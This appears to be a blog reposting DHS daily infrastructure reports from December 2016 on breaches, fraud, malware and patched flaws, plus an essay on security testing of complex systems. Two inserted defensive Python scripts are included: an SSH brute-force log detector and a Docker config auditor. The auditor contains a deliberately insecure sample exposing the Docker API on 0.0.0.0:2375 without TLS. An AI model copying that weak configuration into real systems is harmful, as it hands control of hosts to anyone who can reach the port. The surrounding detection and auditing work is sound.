20. December 23, U.S. Environmental Protection Agency – (Rhode Island) Settlement reached at the Peterson/Puritan, Inc. Superfund Site in Cumberland and Lincoln, R.I. The U.S. Environmental Protection Agency, U.S. Department of Justice, and Rhode Island Department of Environmental Protection reached a more than $40 million settlement December 23 to resolve Federal and State liability claims against around 100 potentially responsible parties for the cleanup of Operable Unit Two of the Peterson/Puritan, Inc. Superfund Site in Cumberland and Lincoln, Rhode Island, following decades of hazardous waste dumping at the site that polluted the neighboring Blackstone River, groundwater, and soils. The settlement calls for the excavation and consolidation of contaminated soils and sediments, construction of a multi-layered impermeable cap, and long term monitoring, among other measures. Source: https://www.epa.gov/newsreleases/settlement-reached-petersonpuritan-inc-superfund-site-cumberland-and-lincoln-ri

• About 500 Kit Carson Electric Cooperative, Inc. customers in Arroyo Hondo, Arroyo Seco, and Questa, New Mexico, were without Internet service for roughly 36 hours December 20 – December 22 due to a hardware failure. – Taos News See item 24 below in the Communications Sector

Financial Services Sector

7. December 23, SecurityWeek – (International) Phishers adopt malware distribution-like tactics. Proofpoint security researchers reported that a recently spotted phishing campaign designed to steal credit card information was employing a technique previously associated with malware distribution, which involves the distribution of a malicious Hypertext Markup Language (HTML) attachment that is XOR-encoded inside a password protected .zip archive to make detection more difficult and to convince victims that the email is legitimate. The spam emails also leveraged stolen branding and social engineering to trick users into giving away their credit card information by telling the spam recipients that they need to update their credit card security information in order to receive a new card equipped with a chip. Source: http://www.securityweek.com/phishers-adopt-malware-distribution-tactics

8. December 23, Cottage Grove Herald-Independent – (Wisconsin) Card skimmers strike Monona, Cottage Grove: Information gathered after thieves use readers, cameras at bank, credit union ATMs. Authorities in Monona, Wisconsin, are searching December 23 for 4 Romanian nationals suspected of installing card readers and cameras at outside ATMs at Monona State Bank, Old National Bank, and University of Wisconsin Credit Union locations in Monona, as well as at a Cottage Grove branch of Monona State Bank between November and December 2016. Source: http://www.hngnews.com/monona_cottage_grove/article_e3a895c0-c925-11e6-b531-27fa05478e12.html

Information Technology Sector

23. December 27, SecurityWeek – (International) Critical RCE flaw patched in PHPMailer. The developers of PHPMailer released version 5.2.18 of the product to resolve a critical remote code execution (RCE) flaw after a security researcher from Legal Hackers found the flaw can be exploited by a remote, unauthenticated attacker for arbitrary code execution in the context of the Web server user in order to compromise a targeted Web application. The researcher found the vulnerability can be exploited through Website components including feedback forms, registration forms, and password reset features that use a version of PHPMailer for sending emails that is impacted by the security hole. Source: http://www.securityweek.com/critical-rce-flaw-patched-phpmailer

For another story, see item 7 above in the Financial Services Sector

Communications Sector

24. December 25, Taos News – (New Mexico) Kit Carson Internet restored after multi-day outage. About 500 Kit Carson Electric Cooperative, Inc. customers in parts of Arroyo Hondo, Arroyo Seco, and Questa, New Mexico, were without Internet service for roughly 36 hours December 20 – December 22 due to a hardware failure at 2 of the company’s substations. The exact cause of the outage remains under investigation.

Friday, December 23, 2016



The report upon which this is based was not published until December 27, 2016 at 11:42AM. My apologies but it is beyond my control!

Complete DHS Report for December 23, 2016

Daily Report

Top Stories

• The former director of fixed income for the New York State Common Retirement Fund and 2 representatives at separate broker-dealers were charged December 21 for their alleged roles in a $2.5 billion pay-to-play scheme. – U.S. Securities and Exchange Commission See item 4 below in the Financial Services Sector

• The founder and chief executive officer (CEO) of Frisco-based Texas First Financial LLC was arrested December 20 for allegedly orchestrating a Ponzi scheme that defrauded investors out of $6 million. – Downtown Austin Patch See item 5 below in the Financial Services Sector

• More than 430 flights were delayed and 59 others were canceled at Los Angeles International Airport December 21 – December 22. – ABC News

6. December 22, ABC News – (California) Holiday travelers gripe as delays pile up at Los Angeles International Airport. More than 430 flights were delayed and 59 others were canceled at Los Angeles International Airport December 21 – December 22 due to airport construction, inclement weather, and the increased number of flights and passengers.

• Community Health Plan of Washington began notifying nearly 400,000 current and former patients December 21 that their personal information, including Social Security numbers, was exposed in a data breach. – Seattle Times; Yakima Herald-Republic

18. December 22, Seattle Times; Yakima Herald-Republic – (Washington) Data breach exposes info for 400,000 Community Health Plan members. Community Health Plan of Washington is notifying nearly 400,000 current and former patients December 21 that their personal information, including Social Security numbers, was exposed in a data breach after an anonymous caller notified the firm November 7 that they had discovered a vulnerability in the computer network of the company that provides the health organization technical services. Officials stated there is no evidence that the information was misused.

Financial Services Sector

4. December 21, U.S. Securities and Exchange Commission – (International) SEC charges former New York pension official and two brokers in pay-to-play scheme. The former director of fixed income for the New York State Common Retirement Fund and 2 representatives at separate broker-dealers were charged December 21 for their alleged roles in a pay-to-play scheme where the director used his position to divert $2.5 billion in State business to the brokers’ firms in exchange for over $100,000 worth of illicit bribes and benefits from January 2014 – February 2016. The charges allege that the scheme netted the brokers millions of dollars in commissions, and allege that the brokers provided considerable assistance to the State official in hiding the scheme from the Retirement Fund.

5. December 20, Downtown Austin Patch – (Texas) Dallas man billing self as financial guru via investment seminars arrested in alleged Ponzi scheme. The founder and chief executive officer (CEO) of Frisco-based Texas First Financial LLC was arrested December 20 for allegedly orchestrating a Ponzi scheme that defrauded investors out of $6 million from the sale of notes, stock certificates, and investment contracts in Dallas-based StaMedia Group from 2014 to 2016 and Frisco-based TenList Inc. The executive and his sales associates allegedly raised money from StaMedia investors without disclosing that the business had negligible revenue and net income since its establishment in 2013, and reportedly concealed ongoing Federal investigations into his sale of investments. Source: http://patch.com/us/across-america/man-billing-himself-financial-guru-investment-seminars-arrested-alleged-ponzi

Information Technology Sector

22. December 21, SecurityWeek – (International) Rakos malware takes over embedded Linux devices. ESET security researchers warned that a newly observed piece of malware, dubbed Rakos, is targeting embedded Linux devices via brute force Secure Shell (SSH) login attempts in order to infect vulnerable devices and servers with an open SSH port, and use them to create a large botnet and further spread the malware. The researchers also found that Rakos is able to update its configuration file from a specific command and control (C&C) location, and provides the attacker with complete control over an impacted device, as it sends information including the device’s Internet Protocol (IP) address, username, and password.
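The Rakos item describes the one observable a defender always has for this kind of campaign: a burst of failed SSH password logins from one source, sometimes followed by a success. The script below is an added example, not code from the page, from ESET or from SecurityWeek; it parses constructed OpenSSH auth.log lines and flags sources that exceed an assumed threshold of five failures in a sixty-second window, marking separately the sources that got in after the burst (those need response, not just a block rule).

```python
"""Flag SSH password brute-force bursts in OpenSSH auth.log lines.

Added example for the Rakos item above: this is not code from the page, from
ESET or from SecurityWeek. The log lines are constructed sample data in the
standard OpenSSH syslog format; the threshold (5 failures) and window (60 s)
are assumed tuning values, not figures the article gives.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: a burst of failed logins from one source ending in a
# successful password login, then one benign failure from a second source.
SAMPLE_AUTH_LOG = """\
Dec 21 03:14:01 edge sshd[1201]: Failed password for root from 203.0.113.7 port 51022 ssh2
Dec 21 03:14:02 edge sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 51023 ssh2
Dec 21 03:14:03 edge sshd[1201]: Failed password for invalid user pi from 203.0.113.7 port 51024 ssh2
Dec 21 03:14:04 edge sshd[1201]: Failed password for root from 203.0.113.7 port 51025 ssh2
Dec 21 03:14:05 edge sshd[1201]: Failed password for root from 203.0.113.7 port 51026 ssh2
Dec 21 03:14:06 edge sshd[1201]: Accepted password for root from 203.0.113.7 port 51027 ssh2
Dec 21 03:14:07 edge sshd[1201]: Received disconnect from 203.0.113.7 port 51027:11: Bye Bye
Dec 21 03:20:11 edge sshd[1310]: Failed password for alice from 198.51.100.4 port 40001 ssh2
Dec 21 03:20:20 edge sshd[1310]: Accepted publickey for alice from 198.51.100.4 port 40002 ssh2
"""

# Matches the OpenSSH "Failed/Accepted <method> for [invalid user] <user>
# from <ip> port <n> ssh2" lines; other sshd messages are skipped.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse_auth_log(text, year=2016):
    """Return login events as dicts; syslog lines carry no year, so one is assumed."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "ip": m.group("ip"), "user": m.group("user"),
                       "result": m.group("result"), "method": m.group("method")})
    return events


def detect_brute_force(events, threshold=5, window_seconds=60):
    """Sources with >= threshold failed logins inside any window_seconds span.

    Returns {ip: {"failures": n, "users": set, "success_after": bool}};
    success_after marks a source that logged in successfully after the burst,
    the case that needs incident response rather than only a firewall rule.
    """
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev["ip"]].append(ev)

    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["result"] == "Failed"]
        burst = False
        start = 0
        for end in range(len(fails)):  # sliding window over failure times
            while (fails[end]["ts"] - fails[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                burst = True
                break
        if not burst:
            continue
        last_fail = fails[-1]["ts"]
        success_after = any(e["result"] == "Accepted" and e["ts"] >= last_fail for e in evs)
        findings[ip] = {"failures": len(fails),
                        "users": {e["user"] for e in fails},
                        "success_after": success_after}
    return findings


if __name__ == "__main__":
    for ip, finding in detect_brute_force(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(ip, finding)
```

On the constructed sample the script reports only 203.0.113.7, with five failures across three usernames and a password login after the burst; alice's single typo from 198.51.100.4 stays below the threshold. Tune `threshold` and `window_seconds` to your own baseline, and treat any `success_after` hit on a device with an open SSH port as an incident rather than a statistic.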

23. December 21, SecurityWeek – (International) Vulnerabilities found in Siemens Desigo PX, SIMATIC products. Siemens released patches and workarounds to address several flaws in all versions of its SIMATIC S7-300 and S7-400 programmable logic controllers (PLCs) after researchers from Beijing Acorn Network Technology found the security holes can be exploited to obtain credentials from a PLC configuration with protection level 2, and cause a denial-of-service condition by sending maliciously crafted packets to transmission control protocol (TCP) port 80. Siemens also described a cryptographic issue in its Desigo PX product which could allow a remote attacker to reconstruct the corresponding private key. Source: http://www.securityweek.com/vulnerabilities-found-siemens-desigo-px-simatic-products

24. December 21, SecurityWeek – (International) Spam “hailstorms” deliver variety of threats. Researchers from Cisco Talos warned that a new type of spam campaign, dubbed hailstorm spam, sends over 75,000 Domain Name System (DNS) queries per hour and relies on the use of a large number of Internet Protocol (IP) addresses from around the world to send the queries. Cisco determined that servers in the U.S. are targeted the most by hailstorm spam campaigns compared to other countries. Source: http://www.securityweek.com/spam-hailstorms-deliver-variety-threats

Communications Sector

Nothing to report


Tuesday, December 27, 2016



Complete DHS Report for December 27, 2016

Daily Report

Top Stories

• A December 22 explosion at the New Haven Chlor-Alkali LLC facility in Connecticut prompted nearby residents to evacuate and forced the temporary shutdown of Amtrak trains from New Haven to Hartford. – New Haven Register

2. December 22, New Haven Register – (Connecticut) Explosion in New Haven damages Welton Street building, rocks nearby areas. A December 22 explosion at the New Haven Chlor-Alkali LLC facility in Connecticut caused extensive damage to the rear of the facility, prompted the evacuation of homes within 1,500 feet of the building, and forced the temporary shutdown of Amtrak trains from New Haven to Hartford after some debris from the explosion landed on the tracks. No injuries were reported and the cause of the explosion remains under investigation. Source: http://www.nhregister.com/general-news/20161222/explosion-in-new-haven-damages-welton-street-building-rocks-nearby-areas

• Two Orlando residents were charged December 22 for their alleged roles in a multi-state debit card skimming scheme that bilked over 100 victims out of thousands of dollars. – WSFA 12 Montgomery

4. December 22, WSFA 12 Montgomery – (National) AL authorities catch suspects in multi-state debit card skimming scheme. Two Orlando residents were charged December 22 for their alleged roles in a multi-state debit card skimming scheme that bilked over 100 victims in Alabama, Florida, Tennessee, and Virginia out of thousands of dollars. Authorities seized $6,490 in cash, 39 stolen debit card numbers with PIN numbers, and 315 gift cards when the suspects were arrested in Baldwin County, Alabama.  Source: http://www.wbrc.com/story/34115240/al-authorities-catch-suspects-in-multi-state-debit-card-skimming-scheme

• Teva Pharmaceutical Industries Ltd., and its subsidiary, Teva LLC agreed December 22 to pay a total of more than $283 million to resolve criminal charges associated with Foreign Corrupt Practices Act violations. – U.S. Department of Justice

21. December 22, U.S. Department of Justice – (International) Teva Pharmaceutical Industries Ltd. agrees to pay more than $283 million to resolve Foreign Corrupt Practices Act charges. Teva Pharmaceutical Industries Ltd., and its wholly-owned Russian subsidiary, Teva LLC agreed December 22 to pay a total of more than $283 million to resolve criminal charges associated with Foreign Corrupt Practices Act (FCPA) violations where the company and its subsidiaries paid millions of dollars in bribes to a high-ranking government official in Russia to influence the official to use his authority to increase sales of the firm’s drug, Copaxone, and bribed a senior government official in Ukraine to approve Teva drug registrations. In addition, the firm failed to implement adequate internal accounting controls and failed to enforce controls it had in place at its Mexican subsidiary, allowing bribes to be paid to doctors employed by the Mexican government.

• Federal officials announced December 22 that Gardena, California-based Total Call Mobile, LLC agreed to pay $30 million for defrauding the Federal Government’s Lifeline Program. – U.S. Attorney’s Office, Southern District of New York  See item 25 below in the Communications Sector

Information Technology Sector

23. December 22, SecurityWeek – (International) Cisco CloudCenter Orchestrator flaw exploited in attacks. Cisco warned customers about a critical privilege escalation flaw that has been exploited against its CloudCenter Orchestrator (CCO) systems to allow an unauthenticated attacker to remotely install malicious Docker containers with arbitrary privileges, including root by abusing a flaw in the Docker Engine configuration. Cisco reported the flaw exists due to a misconfiguration that makes the Docker Engine management port accessible from the outside, and the flaw has been resolved with the release of CCO version 4.6.2.
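The CloudCenter Orchestrator item comes down to one configuration fact: the Docker Engine's TCP management port was reachable from outside, and anyone who can talk to that port controls the engine. The audit function below is an added example, not Cisco's or SecurityWeek's code, and the two `daemon.json` documents are constructed samples rather than the actual CCO configuration (which the page does not show); it flags any `tcp://` listener bound to a non-loopback address unless client certificates are required with `tlsverify`, and shows the weak setting beside the hardened one.

```python
"""Audit a Docker daemon.json for an engine API reachable without authentication.

Added example for the CloudCenter Orchestrator item above: this is not Cisco's
or SecurityWeek's code, and the two configurations are constructed samples,
not the actual CCO configuration (which the page does not show). They
illustrate the class of misconfiguration described there: the Docker Engine
management port bound on every interface with no client authentication, which
lets any client that can reach the port run containers with whatever
privileges it asks for.
"""
import json
from urllib.parse import urlsplit

# Constructed weak configuration: plaintext TCP API on all interfaces.
WEAK_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}"""

# Constructed hardened configuration: TCP API only with mutual TLS
# (tlsverify makes the daemon require a client certificate signed by tlscacert).
HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}
TLS_FILES = ("tlscacert", "tlscert", "tlskey")


def audit_docker_hosts(daemon_json_text):
    """Return a list of finding strings; an empty list means no exposed TCP API."""
    cfg = json.loads(daemon_json_text)
    findings = []
    tls_verify = bool(cfg.get("tlsverify"))
    missing_tls_files = [k for k in TLS_FILES if not cfg.get(k)]

    for host in cfg.get("hosts", []):
        parts = urlsplit(host)
        if parts.scheme != "tcp":
            continue  # unix:// and fd:// sockets are local, guarded by file permissions
        bind = parts.hostname or ""  # "" for "tcp://:2375", which binds all interfaces
        if bind in LOOPBACK:
            continue  # only processes on the host itself can reach it
        if not tls_verify:
            findings.append(
                f"{host}: engine API listening on a non-loopback address without "
                f"tlsverify; any client that reaches this port controls the daemon")
        elif missing_tls_files:
            findings.append(
                f"{host}: tlsverify is set but {', '.join(missing_tls_files)} "
                f"missing; the TLS configuration is incomplete and needs review")
    return findings


if __name__ == "__main__":
    print("weak:", audit_docker_hosts(WEAK_DAEMON_JSON))
    print("hardened:", audit_docker_hosts(HARDENED_DAEMON_JSON))
```

The weak sample produces one finding for `tcp://0.0.0.0:2375`; the hardened sample produces none, as does a listener bound to `127.0.0.1` or a configuration with only the Unix socket. The check is deliberately static, so it can run in a build or configuration-management pipeline before an appliance is deployed; pair it with a network-level rule that the management port is not reachable from outside the orchestration network, since a correct `daemon.json` does not help if someone later starts the daemon with a `-H` flag on the command line.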

Communications Sector

24. December 22, SecurityWeek – (International) Remotely exploitable 0-day impacts NETGEAR WNR2000 routers. A security researcher found that version 5 of Netgear’s WNR2000 routers are plagued with several flaws, including a stack buffer overflow issue that could allow an unauthenticated attacker to take full control of the device and remotely execute code, as well as an issue where the router allows an admin to perform various functions through a function invoked in the Hypertext Transfer Protocol (HTTP) server, uhttpd, which once reversed, allows an unauthenticated attacker to perform sensitive admin functions and retrieve the administrative password. The flaws are exploitable over a local area network (LAN), and remotely for routers with remote administration enabled. Source: http://www.securityweek.com/remotely-exploitable-0-day-impacts-netgear-wnr2000-routers

25. December 22, U.S. Attorney’s Office, Southern District of New York – (National) Manhattan U.S. Attorney announces $30 million settlement with Total Call Mobile for defrauding government program offering discounted mobile services for low-income consumers. The U.S. Federal Communications Commission (FCC) and other officials announced December 22 that Gardena, California-based Total Call Mobile, LLC agreed to pay $30 million for defrauding the Federal Government’s Lifeline Program after Total Call, Locus Telecommunications, LLC, and their shared corporate parent, KDDI America, Inc. knowingly submitted false claims to the program that sought reimbursement for tens of thousands of consumers who did not meet Lifeline’s eligibility requirements. As part of the settlement, Total Call agreed to no longer participate in the Lifeline Program. Source: https://www.justice.gov/usao-sdny/pr/manhattan-us-attorney-announces-30-million-settlement-total-call-mobile-defrauding

Thursday, December 22, 2016



Complete DHS Report for December 22, 2016

Daily Report

Top Stories

• The U.S. President declared December 20 that hundreds of millions of acres of Federally-owned land in the Arctic Ocean and canyons in the Atlantic Ocean were withdrawn from offshore oil and gas drilling. – Washington Post

1. December 20, Washington Post – (International) President bans oil drilling in large areas of Atlantic and Arctic oceans. The U.S. President declared December 20, in coordination with the Canadian Prime Minister, that hundreds of millions of acres of Federally-owned land in the Arctic Ocean and canyons in the Atlantic Ocean were withdrawn from offshore oil and gas drilling in an effort to protect the regions from future offshore oil and gas activity risks. The declaration will protect areas of Atlantic Ocean canyons that stretch from Massachusetts to Virginia, and large portions of the Chukchi and Beaufort seas north of Alaska. Source: https://www.washingtonpost.com/news/energy-environment/wp/2016/12/20/president-obama-expected-to-ban-oil-drilling-in-large-areas-of-atlantic-and-arctic-oceans/?utm_term=.5732ebff424b

• Volkswagen Group announced December 20 that it will pay $225 million in environmental remediation after it was found that the company fitted several makes of its vehicles with software used to cheat U.S. emissions standards. – USA Today

2. December 20, USA Today – (National) Volkswagen will buy back 20K more polluting diesel cars. The U.S. Environmental Protection Agency, U.S. Department of Justice, and California State regulators announced December 20 that the Volkswagen Group agreed to pay $225 million in environmental remediation, fix around 63,000 of its vehicles, and buy back another 20,000 vehicles equipped with 3-liter, 6-cylinder diesel engines in the U.S. after it was found that the company fitted several makes of its vehicles with software used to cheat U.S. emissions standards. Source: http://www.usatoday.com/story/money/cars/2016/12/20/volkswagen-3-liter-diesel-settlement/95661794/

• The former owner and president of Staten Island, New York-based Premier Links, Inc. were arrested December 20 for allegedly stealing $9.3 million from more than 300 investors in roughly 40 States through their unregistered broker-dealer business. – U.S. Attorney’s Office, Eastern District of New York See item 3 below in the Financial Services Sector

• The former owner and operator of a Rockingham, North Carolina-based tax preparation business pleaded guilty December 19 after he caused the U.S. Internal Revenue Service (IRS) over $10 million in losses. – U.S. Department of Justice See item 4 below in the Financial Services Sector

Financial Services Sector

3. December 20, U.S. Attorney’s Office, Eastern District of New York – (National) Former owner and president of unregistered broker-dealer indicted in a $9 million securities fraud scheme. The former owner and president of Staten Island, New York-based Premier Links, Inc. were arrested December 20 for allegedly stealing $9.3 million from more than 300 investors in roughly 40 States from approximately 2005 – 2012 through their unregistered broker-dealer business by persuading investors to purchase shares of worthless businesses with the promise of large returns. The charges allege that the executives operated Premier Links as a “boiler room,” using cold callers and other means to compel victims to invest their money in securities, and converted investors’ money upon receipt into cash through more than 900 ATM and teller withdrawals, among other fraudulent actions. Source: https://www.justice.gov/usao-edny/pr/former-owner-and-president-unregistered-broker-dealer-indicted-9-million-securities

4. December 19, U.S. Department of Justice – (North Carolina) North Carolina owner of tax preparation business pleads guilty to conspiracy to defraud the IRS. The former owner and operator of a Rockingham, North Carolina-based tax preparation business, Herb’s Helping Hands, pleaded guilty December 19 after he caused the U.S. Internal Revenue Service (IRS) over $10 million in losses by preparing and filing fraudulent electronic Federal income tax returns that claimed fictitious refunds for clients, and reporting fake or inflated income and dependency exemptions to produce false or inflated Earned Income Tax Credits, fake business income and deficits, and fraudulent deductions, among other fraudulent actions. The owner and his co-conspirators bought or stole the personal identifying information of minors and other individuals, falsely listing them as dependents on returns to generate larger fraudulent client refunds, and directed some of the clients’ refunds into his own bank account or an account he controlled. Source: https://www.justice.gov/opa/pr/north-carolina-owner-tax-preparation-business-pleads-guilty-conspiracy-defraud-irs

Information Technology Sector

20. December 21, SecurityWeek – (International) VMware patches VDP, ESXi vulnerabilities. VMware released patches addressing a flaw in vSphere Data Protection (VDP) which could be exploited to log into the affected appliance with root privileges, as well as a cross-site scripting (XSS) vulnerability in the ESXi hypervisor where an attacker with permission to manage virtual machines (VM) via the ESXi Host Client can import a maliciously crafted VM to trigger the flaw, or can trick a vSphere administrator into importing the specially crafted VM.

For another story, see item 21 below in the Communications Sector

Communications Sector

21. December 20, SecurityWeek – (International) Cybercriminals make millions with ad fraud bot farm. White Ops researchers reported that cybercriminals can earn up to $5 million per day through a massive ad fraud operation, dubbed Methbot, which is powered by a bot farm that uses up to 1,200 servers housed by data centers in Dallas and other cities, and more than 570,000 Internet Protocol version 4 (IPv4) addresses to make it appear as though they belong to residential Internet service providers (ISPs) in the U.S. The bot farm generates a fake Webpage with only the elements needed to support an ad, and then requests an ad from a network using a spoofed Uniform Resource Locator (URL) matching that of a premium publisher, which is subsequently loaded in the simulated browser while Methbot’s various human-mimicking mechanisms are enabled to convince anti-fraud systems the activity is generated by real users.

MS16-148 – Critical: Security Update for Microsoft Office (3204068) – Version: 1.1

Severity Rating: Critical
Revision Note: V1.1 (December 21, 2016): Revised bulletin to correct a CVE ID. CVE-2016-7298 has been changed to CVE-2016-7274, and the vulnerability information has been updated. This is an informational change only. Customers who have successfully installed the updates do not need to take any further action.
Summary: This security update resolves vulnerabilities in Microsoft Office. The most severe of the vulnerabilities could allow remote code execution if a user opens a specially crafted Microsoft Office file. An attacker who successfully exploited the vulnerabilities could run arbitrary code in the context of the current user. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Wednesday, December 21, 2016



Complete DHS Report for December 21, 2016

Daily Report

Top Stories

• A Chinese national pleaded guilty December 19 to stealing and exploiting highly sensitive military technology and documents, and transporting the majority of the stolen information to China from 2013 – 2014. – U.S. Department of Justice

3. December 19, U.S. Department of Justice – (Connecticut) Chinese national admits to stealing sensitive military program documents from United Technologies. A Chinese national pleaded guilty December 19 to stealing and exploiting highly sensitive military technology and documents from United Technologies Corporation’s United Technologies Research Center (UTRC) and transporting the majority of the stolen information to China from 2013 – 2014. The defendant admitted his intent to advance China’s defense industry, and beginning in 2013, expressed his intent to individuals outside UTRC to return to China to work on research projects at select Chinese State-run universities using knowledge and materials he had acquired during his UTRC employment.

• Bliss, Idaho officials worked to clean up roughly 6,000 gallons of raw sewage that spilled over a lagoon dike edge December 17. – KMVT 11 Twin Falls/KSVT 14 Twin Falls

12. December 17, Los Angeles Times – (California) Orange County children’s dental clinic closed after bacteria found in new water system. Health officials in Orange County, California, ordered the closure of the Children’s Dental Group of Anaheim December 15 after lab tests revealed the presence of Mycobacterium in the dental clinic’s new internal water system, which was replaced following a previous outbreak of oral infections. The county has recorded 58 reports of infections at the clinic. Source: http://www.latimes.com/local/lanow/la-me-ln-anaheim-dental-office-20161217-story.html

• Los Angeles County officials announced December 19 that the county is notifying about 756,000 people that their personal information may have been compromised after 108 county employees were victims of a phishing email scam in May 2016. – SecurityWeek

14. December 19, SecurityWeek – (California) Los Angeles County notifies 756,000 of data breach. Los Angeles County officials announced December 19 that the county is notifying about 756,000 people that their personal information, including Social Security numbers, names, and dates of birth, among other sensitive information, may have been compromised after 108 county employees were victims of a phishing email scam in May 2016. Officials reported a Nigerian national was charged in connection with the incident. Source: http://www.securityweek.com/los-angeles-county-notifies-756000-data-breach

• Kaspersky Lab researchers warned that a spear phishing campaign has targeted roughly 500 organizations in the smelting, power generation and transmission, construction, and engineering industries across 50 countries since August 2016. – SecurityWeek See item 20 below in the Information Technology Sector

Financial Services Sector

4. December 19, Arizona Republic – (Arizona) FBI seeks leads on ‘Blues Bandit’ bank robber who struck in Phoenix, Glendale. The FBI is searching December 19 for a man dubbed the “Blues Bandit” who is suspected of robbing 3 Desert Schools Federal Credit Union locations inside Walmart stores in Phoenix and Glendale, Arizona, between October and December 2016. Source: http://www.azcentral.com/story/news/local/phoenix/2016/12/19/fbi-seeks-leads-blues-bandit-bank-robber-who-struck-phoenix-glendale/95612948/

Information Technology Sector

20. December 19, SecurityWeek – (International) Spear phishing attacks target industrial firms. Kaspersky Lab researchers warned that a spear phishing campaign has targeted roughly 500 organizations in the smelting, power generation and transmission, construction, and engineering industries across 50 countries since August 2016 in order to spy on users and steal sensitive data. The phishing emails contain a subject line with text used in a company’s correspondence in order to trick the victim into opening the malicious Rich Text Format (RTF) file attached, which downloads a malware that can diminish the ability of antivirus products. Source: http://www.securityweek.com/spear-phishing-attacks-target-industrial-firms-kaspersky-lab-ics-cert

21. December 19, SecurityWeek – (International) Brute force attacks on WordPress Websites soar. WordPress security firm Wordfence warned that the number of brute force attacks targeting WordPress Websites has increased to more than 700,000 attacks per day since November 24, and the number of unique attacking Internet Protocol (IP) addresses has increased from an average of about 13,000 per day in the period between October 16 and November 24 to over 30,000 per day. The firm reported it has blocked up to 23 million brute force attack attempts per day.

For another story, see item 14 above in Top Stories

Communications Sector

Nothing to report

Hacking Complex Systems

Back in the day, you could download a piece of software, reverse engineer / fuzz it, find bugs, notify the vendor, post on Full Disclosure, watch a patch come out, and move on to the next bug.

These days systems have become very complex. A system might include:
  • A HID (Touch screen, keyboard, other devices)
  • Data Inputs (USB key, Bluetooth, Wireless, Satellite, Cell)
  • Firmware (BIOS or other embedded aspects)
  • OS
  • Applications (both OEM and 3rd party)
  • Media Servers
  • Other control systems
  • Telematics interfaces

This collection of components may be very expensive, on the order of $250k in some cases, or say $10-20k for a car. These components may be made by multiple different vendors, all with NDAs and MSAs between them.

This whole system is then certified and tested by numerous bodies such as FAA, TSA, NHTSA, NAFTA OEMs, Avionics Manufacturers such as Boeing and Airbus, Airlines, etc. There may be regulations and requirements around patch cycle timing, disclosure, and legal.

How in this context, can these systems be tested for security issues in a reliable and effective manner? Right now there are several ways this testing occurs:

1.) Via Testing Contracts.

The vendor puts out a bid or otherwise engages a 3rd party security company to test the system. NDAs and MSAs are exchanged, access to the system is provided, testing performed, and results delivered. Fixes are developed and pushed out according to the schedule and requirements agreed upon by all the organizations outlined above.

PROS

Vendor has a level of protection that their reputation won't be tarnished via media disclosures, their IP stolen, etc. Vendor has some assurance the testers are competent and there is a level of service expected.

CONS

This process is not public and people outside this framework have little to no insight into what is going on, how testing is done (or if), who is doing it, what fixes have been put in place. etc. This also limits the number of bright people who can see and test the system, almost ensuring that some bugs will be missed.

2.) Bug Bounties.

Vendors make some aspect of the system available publicly for anyone to test and pays a bounty for valid vulnerabilities discovered. In some special cases the vendor may make an entire system accessible for a limited amount of time. (Time limited to offset the cost of the system)

PROS

Process is public and many eyes are on the product. Raises the exposure of the product to new testers and approaches. Builds a level of trust in the vendor and assurance that the vendor "cares about security".

CONS

Costs the vendor time and effort and often produces little more than noise, or bugs already known about through internal testing. (I'm basing this on my personal discussions with vendors in the real world). Testing quality is often very low. Often the holistic system cannot be tested in this way, only components.

3.) Rogue Testing.

This is sort of where I came up in the industry initially before moving more into 1.) above. The way this works is that a researcher (or team of researchers) and/or a security company gains access to a system in some way. Examples include buying a piece of the system on eBay or, in the case of publicly available systems such as avionics, testing it live. A car could be bought as well. This is sort of a black box approach, as access to all the back end systems, telematics, source, etc. will not be available.

PROS

A researcher can sort of do whatever they want without constraints. A security company can leverage this for media attention (marketing / sales), and it drums up interest for conference talks. Real bugs are found this way and the vendor is technically notified, either as a heads up by the finder or via the media.

CONS

No trust is developed between the vendor and the bug finder. In fact the relationship is almost always adversarial by its nature. The public receives an unclear picture of the true threat. Do they trust the finder, who is often over hyping to get attention, or do they trust the vendor, who has a material interest in under hyping and disproving the bug?

I'm sure I am missing other pros and cons to each of these, so please feel free to send me ideas. I'm also sure there are other approaches to testing which is why I am making this post. Here are some questions to consider:

  • Are complex systems such as avionics and automotive substantially the same from a testing perspective as Windows hosts or endpoint software?
  • Is live testing on a passenger vehicle really the right way to do security testing?
  • Should only professional security companies with contracts in hand be allowed to test?
  • Are bug bounties in their current incarnation really effective for these types of systems?

My answer to the above questions is probably no.

I propose that we, the security community, collectively try to come up with a better way or framework for doing this. Any ideas will be appreciated and considered. Are you already doing something in this arena that is better than what I have outlined? Is there something you thought would work but have not gotten traction on it?

I'd love to hear from vendors, sec companies, and researchers alike.

I also propose that unethical behavior in our industry be called out. Every time a company brushes up against extortion, over hypes a bug, or claims credit for non-employees' work, just for short term sales, it damages the credibility of all of us and makes our jobs harder. Let's require the best of ourselves. Security has become huge, and is about to become bigger. Over the last year think how many times hacking has been in mainstream media. Now contrast that with 10 years ago. This is an industry that is about to explode. Do we really want to be found wanting when the world finally is ready to take us seriously?

Tuesday, December 20, 2016



Complete DHS Report for December 20, 2016

Daily Report

Top Stories

